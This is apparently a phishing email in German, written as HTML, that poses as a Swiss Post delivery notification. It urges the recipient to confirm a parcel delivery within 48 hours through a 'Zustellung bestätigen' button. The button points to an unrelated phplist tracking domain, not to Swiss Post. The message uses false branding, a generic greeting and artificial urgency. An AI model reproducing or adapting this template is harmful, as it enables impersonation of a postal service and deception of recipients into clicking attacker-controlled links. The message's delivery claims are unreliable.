<!DOCTYPE html>
<html lang="de">
        <head>
                <meta charset="UTF-8" />
                <meta content="width=device-width, initial-scale=1.0" name="viewport" />
                <title>Versandbenachrichtigung</title>
                <style type="text/css">
body {        font-family: Arial, sans-serif;        background-color: #f5f5f5;        color: #333333;        margin: 0;        padding: 20px;    }    .container {        max-width: 600px;        margin: auto;        background-color: #ffffff;        border: 1px solid #dddddd;        border-radius: 10px;        padding: 20px;    }    .header {        text-align: center;        padding: 20px;        background-color: #ffcc00;        border-top-left-radius: 10px;        border-top-right-radius: 10px;    }    .header img {        max-width: 200px;    }    .title {        font-size: 24px;        font-weight: bold;        margin: 20px 0;        color: #333333;    }    .content {        text-align: center;        padding: 20px 0;        line-height: 1.6;        color: #333333;    }    .button {        text-align: center;        margin-top: 20px;    }    .cta-button {        background-color: #ffcc00;        color: #333333;        padding: 12px 20px;        text-decoration: none;        font-weight: bold;        border-radius: 5px;        display: inline-block;    }    .footer {        text-align: center;        font-size: 12px;        color: #777777;        padding: 10px 0;        border-top: 1px solid #dddddd;        margin-top: 20px;    }          </style>
        </head>
        <body>
                <div class="container">
                        <div class="header">
                                <img alt="Swiss Post Logo" src="cid:swiss_post_logo" /></div>
                        <div class="title">
                                Versandbenachrichtigung</div>
                        <div class="content">
                                <p>
                                        Sehr geehrter Kunde,</p>
                                <p>
                                        Ihr Paket ist auf dem Weg und wartet auf Ihre Empfangsbestätigung. Um den Versand abzuschließen, klicken Sie bitte auf den untenstehenden Link.</p>
                                <div class="button">
                                        <a class="cta-button" href="https://trbsoewise.hosted.phplist.com/lists/lt.php?tid=ekhQDgIHBlQEWRwAWFNcHwFSWABPDFIBVxUHVFRTCF8AUAYFUloeXwsCBlRbUggfAVVSB08BUAwEFQ1WAAAUUwdQAg8AUVoHBlkHGg5TXgJQBVkCT1MDW1AVAQJTUhReVgEAGlUAVQQDVQhfAAFeCw">Zustellung bestätigen</a></div>
                                <p>
                                        Bitte bestätigen Sie innerhalb der nächsten 48 Stunden.</p>
                        </div>
                        <div class="footer">
                                <p>
                                        © 2024 Swiss Post SP - Alle Rechte vorbehalten.</p>
                                <p>
                                        Dies ist eine automatische Nachricht. Antworten Sie bitte nicht auf diese E-Mail.</p>
                        </div>
                </div>
                <p>
                         </p>
        </body>
</html>